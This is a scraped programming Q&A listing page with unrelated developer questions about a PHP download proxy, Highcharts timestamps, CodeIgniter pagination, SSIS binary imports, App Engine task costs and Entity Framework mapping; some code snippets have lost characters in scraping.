    I need to create an handy file down loader which will count the amount of bytes downloaded and stop when it has exceed a preset limit. i need to mirror some files but i only have 7 gb per moth of bandwidth and i dont want to exceed the limit. Example limits can be in bytes or number of files, each user has their own limit, as well as a limit for Download Quota itself. So if you set a limit of 2 gigabytes for Download Quota, downloads stop at 2 gigabytes, even if you have 3 users with a limit of 1 gigabyte each. if ($range) { //pass client Range header to rapidshare // _insert($range); $cookie .= "\r\nRange: $range"; $multipart = true; header("X-UR-RANGE-Range: $range"); } //octet-stream + attachment => client always stores file header('Content-type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . $fn . '"'); //always included so clients know this script supports resuming header("Accept-Ranges: bytes"); //awful hack to pass rapidshare the premium cookie $user_agent = ini_get("user_agent"); ini_set("user_agent", $user_agent . "\r\nCookie: enc=$cookie"); $httphandle = fopen($url, "r"); $headers = stream_get_meta_data($httphandle); //let's check the return header of rapidshare for range / length indicators //we'll just pass these to the client foreach ($headers["wrapper_data"] as $header) { $header = trim($header); if (substr(strtolower($header), 0, strlen("content-range")) == "content-range") { // _insert($range); header($header); header("X-RS-RANGE-" . $header); $multipart = true; //content-range indicates partial download } elseif (substr(strtolower($header), 0, strlen("Content-Length")) == "content-length") { // _insert($range); header($header); header("X-RS-CL-" . $header); } } //now show the client he has a partial download if ($multipart) header('HTTP/1.1 206 Partial Content'); flush(); $download_rate = 100; while (!feof($httphandle)) { // send the current file part to the browser $var_stat = fread($httphandle, round($download_rate * 1024)); $var12 = strlen($var_stat); ////////////////////////////////// echo $var_stat; ///////////////////////////////// // flush the content to the browser flush(); // sleep one second sleep(1); }

    Read the article

  • How to troubleshoot a Highcharts script that's not rendering data when date is added and hanging the JS engine with large datasets?

    - by ylluminate
    I have a Highchart JS graph that I'm building in Rails (although I don't think Ruby has real bearing on this problem unless it's the Date output format) to which I'm adding the timestamp of each datapoint. Presently the array of floats is rendering fine without timestamps, however when I add the timestamp to the series it fails to rend. What's worse is that when the series has hundreds of entries all sorts of problems arise, not the least of which is the browser entirely hanging and requiring a force quit / kill. I'm using the following to build the array of arrays data series: series1 = readings.map{|row| [(row.date.to_i * 1000), (row.data1.to_f if BigDecimal(row.data1) != BigDecimal("-1000.0"))] } This yields a result like this: series: [{"name":"Data 1","data":[[1326262980000,1.79e-09],[1326262920000,1.29e-09],[1326262860000,1.22e-09],[1326262800000,1.42e-09],[1326262740000,1.29e-09],[1326262680000,1.34e-09],[1326262620000,1.31e-09],[1326262560000,1.51e-09],[1326262500000,1.24e-09],[1326262440000,1.7e-09],[1326262380000,1.24e-09],[1326262320000,1.29e-09],[1326262260000,1.53e-09],[1326262200000,1.23e-09],[1326262140000,1.21e-09]],"color":"blue"}] Yet nothing appears on the graph as noted. Notwithstanding, when I compare the data series in one of their very similar examples here: http://www.highcharts.com/demo/spline-irregular-time It appears that really the data series are formatted identically (except in mine I use the timestamp vs date method). This leads me to think I've got a problem with the timestamp output, but I'm just not able to figure out where / how as I'm converting the date output to an integer multipled by 1000 to convert it to milliseconds as per explained in a similar Railscasts tutorial. I would very much appreciate it if someone could point me in the right direction here as to what I may be doing wrong. What could cause no data to appear on the graph in smaller sized sets (<100 points) and when into the hundreds causes an apparent hang in the javascript engine in this case? Perhaps ultimately the key lies here as this is the entire js that's being generated and not rendering: jQuery(function() { // 1. Define JSON options var options = { chart: {"defaultSeriesType":"spline","renderTo":"chart_name"}, title: {"text":"Title"}, legend: {"layout":"vertical","style":{}}, xAxis: {"title":{"text":"UTC Time"},"type":"datetime"}, yAxis: [{"title":{"text":"Left Title","margin":10}},{"title":{"text":"Right Groups Title"},"opposite":true}], tooltip: {"enabled":true}, credits: {"enabled":false}, plotOptions: {"areaspline":{}}, series: [{"name":"Data 1","data":[[1326262980000,1.79e-08],[1326262920000,1.69e-08],[1326262860000,1.62e-08],[1326262800000,1.42e-08],[1326262740000,1.29e-08],[1326262680000,1.34e-08],[1326262620000,1.31e-08],[1326262560000,1.51e-08],[1326262500000,1.64e-08],[1326262440000,1.7e-08],[1326262380000,1.64e-08],[1326262320000,1.69e-08],[1326262260000,1.53e-08],[1326262200000,1.23e-08],[1326262140000,1.21e-08]],"color":"blue"},{"name":"Data 2","data":[[1326262980000,9.79e-09],[1326262920000,9.78e-09],[1326262860000,9.8e-09],[1326262800000,9.82e-09],[1326262740000,9.88e-09],[1326262680000,9.89e-09],[1326262620000,1.3e-06],[1326262560000,1.32e-06],[1326262500000,1.33e-06],[1326262440000,1.33e-06],[1326262380000,1.34e-06],[1326262320000,1.33e-06],[1326262260000,1.32e-06],[1326262200000,1.32e-06],[1326262140000,1.32e-06]],"color":"red"}], subtitle: {} }; // 2. Add callbacks (non-JSON compliant) // 3. Build the chart var chart = new Highcharts.StockChart(options); });

    Read the article

  • CI pagination, POST problem

    - by Gwood
    Okay, I am pretty new in CI and I am stuck on pagination. I am performing this pagination on a record set that is result of a query. Now everything seems to be working fine. But there’s some problem probably with the link. I am displaying 10 results per page. Now if the results are less than 10 then it’s fine. Or If I pull up the entire records in the table it works fine. But in case the result is more than 10 rows, then the first 10 is perfectly displayed, and when I click on the pagination link to get to the next page the next page displays the rest of the results from the query as well as, other records in the table. ??? I am confused.. Any help?? Here’s the model code I am using .... function getTeesLike($field,$param) { $this-db-like($field,$param); $this-db-limit(10, $this-uri-segment(3)); $query=$this-db-get(‘shirt’); if($query-num_rows()0){ return $query-result_array(); } } function getNumTeesfromQ($field,$param) { $this-db-like($field,$param); $query=$this-db-get(‘shirt’); return $query-num_rows(); } And here’s the controller code .... $KW=$this-input-post(‘searchstr’); $this-load-library(‘pagination’); $config[‘base_url’]=‘http://localhost/cit/index.php/tees/show/’; $config[‘total_rows’]=$this-T-getNumTeesfromQ(‘Title’,$KW); $config[‘per_page’]=‘10’; $this-pagination-initialize($config); $data[‘tees’]=$this-T-getTeesLike(‘Title’,$KW); $data[‘title’]=‘Displaying Tees data’; $data[‘header’]=‘Tees List’; $data[‘links’]=$this-pagination-create_links(); $this-load-view(‘tee_res’, $data); //What am I doing wrong here ???? Pls help ... I guess the problem is with the $KW=$this-input-post(‘searchstr’); .. Because if I hard code a value for $KW it works fine. May be I should use POST differently ..but how do I pass the value from the form without POSTING it , its CI so not GET ... ??????

    Read the article

  • transforming binary data using ssis and sql server 2008

    - by Rick
    Hello All - I have a task to import/transform and extract zipped binary files that contain both text data as well as embeded binary data. Within the data is data that is relational in nature and needs to be processed into a defined database structure. Currently I have a C# single threaded app that essentially grabs all the files from the directory (currently there is 13K files of varying sizes) and extracts the data on a single thread line by line inserts to the database. As you could imagine this is a very slow process and unacceptable. There are several different parsing routines used depending on the header record in the file. There are potentially upto a million rows per file when all the data is extracted to the row level of detail. Follow on task is to parse those rows into their appropriate tables based on is content. i.e. the textual content has to be parsed further into "buckets" of like data in the database. That about sums up the big picture. Now for the problem task list. How do i iterate through a packet of data using SSIS? In the app the file is decompressed and then is parsed using streams data type and byte arrays and is routed to the required parsing routine based on the header data of each packet. There is bit swapping involved as well. Should i wrap up the app code into a script task(s) and let it do the custom processing? The data is seperated by year and the sql server tables is partitioned by year as well. I need to be able to "catch" bad file data as well and process by hand most likely. Should i simply load the zipped file to sql as a blob and parse the file with T-SQL? Would that be multi threaded if done that way? Not sure how to do the parsing in tsql that is involved here. Which do you think would be faster? Potentially the data that is currently processed via files could come to us via a socket. Can SSIS collect that data in real time? How would i go about setting that up? Processing these new files from the directorys will become a daily task. I can manage the data once i get it to sql server. Getting it there in a timely fashion seems to be the long pole in the tent for me. I would appreciate any comments or suggestions from the group. Rick

    Read the article

  • Optimizing tasks to reduce CPU in a trading application

    - by Joel
    Hello, I have designed a trading application that handles customers stocks investment portfolio. I am using two datastore kinds: Stocks - Contains unique stock name and its daily percent change. UserTransactions - Contains information regarding a specific purchase of a stock made by a user : the value of the purchase along with a reference to Stock for the current purchase. db.Model python modules: class Stocks (db.Model): stockname = db.StringProperty(multiline=True) dailyPercentChange=db.FloatProperty(default=1.0) class UserTransactions (db.Model): buyer = db.UserProperty() value=db.FloatProperty() stockref = db.ReferenceProperty(Stocks) Once an hour I need to update the database: update the daily percent change in Stocks and then update the value of all entities in UserTransactions that refer to that stock. The following python module iterates over all the stocks, update the dailyPercentChange property, and invoke a task to go over all UserTransactions entities which refer to the stock and update their value: Stocks.py # Iterate over all stocks in datastore for stock in Stocks.all(): # update daily percent change in datastore db.run_in_transaction(updateStockTxn, stock.key()) # create a task to update all user transactions entities referring to this stock taskqueue.add(url='/task', params={'stock_key': str(stock.key(), 'value' : self.request.get ('some_val_for_stock') }) def updateStockTxn(stock_key): #fetch the stock again - necessary to avoid concurrency updates stock = db.get(stock_key) stock.dailyPercentChange= data.get('some_val_for_stock') # I get this value from outside ... some more calculations here ... stock.put() Task.py (/task) # Amount of transaction per task amountPerCall=10 stock=db.get(self.request.get("stock_key")) # Get all user transactions which point to current stock user_transaction_query=stock.usertransactions_set cursor=self.request.get("cursor") if cursor: user_transaction_query.with_cursor(cursor) # Spawn another task if more than 10 transactions are in datastore transactions = user_transaction_query.fetch(amountPerCall) if len(transactions)==amountPerCall: taskqueue.add(url='/task', params={'stock_key': str(stock.key(), 'value' : self.request.get ('some_val_for_stock'), 'cursor': user_transaction_query.cursor() }) # Iterate over all transaction pointing to stock and update their value for transaction in transactions: db.run_in_transaction(updateUserTransactionTxn, transaction.key()) def updateUserTransactionTxn(transaction_key): #fetch the transaction again - necessary to avoid concurrency updates transaction = db.get(transaction_key) transaction.value= transaction.value* self.request.get ('some_val_for_stock') db.put(transaction) The problem: Currently the system works great, but the problem is that it is not scaling well… I have around 100 Stocks with 300 User Transactions, and I run the update every hour. In the dashboard, I see that the task.py takes around 65% of the CPU (Stock.py takes around 20%-30%) and I am using almost all of the 6.5 free CPU hours given to me by app engine. I have no problem to enable billing and pay for additional CPU, but the problem is the scaling of the system… Using 6.5 CPU hours for 100 stocks is very poor. I was wondering, given the requirements of the system as mentioned above, if there is a better and more efficient implementation (or just a small change that can help with the current implemntation) than the one presented here. Thanks!! Joel

    Read the article

  • Entity Framework looking for wrong column

    - by m.edmondson
    I'm brand new to the Entity Framework and trying to learn all it can offer. I'm currently working my way through the MVC Music Store tutorial which includes the following code: public ActionResult Browse(string genre) { // Retrieve Genre and its Associated Albums from database var genreModel = storeDB.Genres.Include("Albums") .Single(g => g.Name == genre); return View(genreModel); } as I'm working in VB I converted it like so: Function Browse(ByVal genre As String) As ActionResult 'Retrieve Genre and its Associated Albums from database Dim genreModel = storeDB.Genres.Include("Albums"). _ Single(Function(g) g.Name = genre) Return(View(genreModel)) End Function The problem is I'm getting the following exception: Invalid column name 'GenreGenreId'. Which I know is true, but I can't for the life of my work out where it's getting 'GenreGenreId' from. Probably a basic question but I'll appreciate any help in the right direction. As per requested here is the source for my classes: Album.vb Public Class Album Private _title As String Private _genre As Genre Private _AlbumId As Int32 Private _GenreId As Int32 Private _ArtistId As Int32 Private _Price As Decimal Private _AlbumArtUrl As String Public Property Title As String Get Return _title End Get Set(ByVal value As String) _title = value End Set End Property Public Property AlbumId As Int16 Get Return _AlbumId End Get Set(ByVal value As Int16) _AlbumId = value End Set End Property Public Property GenreId As Int16 Get Return _GenreId End Get Set(ByVal value As Int16) _GenreId = value End Set End Property Public Property ArtistId As Int16 Get Return _ArtistId End Get Set(ByVal value As Int16) _ArtistId = value End Set End Property Public Property AlbumArtUrl As String Get Return _AlbumArtUrl End Get Set(ByVal value As String) _AlbumArtUrl = value End Set End Property Public Property Price As Decimal Get Return _Price End Get Set(ByVal value As Decimal) _Price = value End Set End Property Public Property Genre As Genre Get Return _genre End Get Set(ByVal value As Genre) _genre = value End Set End Property End Class Genre.vb Public Class Genre Dim _genreId As Int32 Dim _Name As String Dim _Description As String Dim _Albums As List(Of Album) Public Property GenreId As Int32 Get Return _genreId End Get Set(ByVal value As Int32) _genreId = value End Set End Property Public Property Name As String Get Return _Name End Get Set(ByVal value As String) _Name = value End Set End Property Public Property Description As String Get Return _Description End Get Set(ByVal value As String) _Description = value End Set End Property Public Property Albums As List(Of Album) Get Return _Albums End Get Set(ByVal value As List(Of Album)) _Albums = value End Set End Property End Class MusicStoreEntities.vb Imports System.Data.Entity Namespace MvcApplication1 Public Class MusicStoreEntities Inherits DbContext Public Property Albums As DbSet(Of Album) Public Property Genres As DbSet(Of Genre) End Class End Namespace

    Read the article

  • Classes to Entities; Like-class inheritence problems

    - by Stacey
    Beyond work, some friends and I are trying to build a game of sorts; The way we structure some of it works pretty well for a normal object oriented approach, but as most developers will attest this does not always translate itself well into a database persistent approach. This is not the absolute layout of what we have, it is just a sample model given for sake of representation. The whole project is being done in C# 4.0, and we have every intention of using Entity Framework 4.0 (unless Fluent nHibernate can really offer us something we outright cannot do in EF). One of the problems we keep running across is inheriting things in database models. Using the Entity Framework designer, I can draw the same code I have below; but I'm sure it is pretty obvious that it doesn't work like it is expected to. To clarify a little bit; 'Items' have bonuses, which can be of anything. Therefore, every part of the game must derive from something similar so that no matter what is 'changed' it is all at a basic enough level to be hooked into. Sounds fairly simple and straightforward, right? So then, we inherit everything that pertains to the game from 'Unit'. Weights, Measures, Random (think like dice, maybe?), and there will be other such entities. Some of them are similar, but in code they will each react differently. We're having a really big problem with abstracting this kind of thing into a database model. Without 'Enum' support, it is proving difficult to translate into multiple tables that still share a common listing. One solution we've depicted is to use a 'key ring' type approach, where everything that attaches to a character is stored on a 'Ring' with a 'Key', where each Key has a Value that represents a type. This works functionally but we've discovered it becomes very sluggish and performs poorly. We also dislike this approach because it begins to feel as if everything is 'dumped' into one class; which makes management and logical structure difficult to adhere to. I was hoping someone else might have some ideas on what I could do with this problem. It's really driving me up the wall; To summarize; the goal is to build a type (Unit) that can be used as a base type (Table per Type) for generic reference across a relatively global scope, without having to dump everything into a single collection. I can use an Interface to determine actual behavior so that isn't too big of an issue. This is 'roughly' the same idea expressed in the Entity Framework.

    Read the article

< Previous Page | 312 313 314 315 316 317 318 319 320 321 322 323  | Next Page >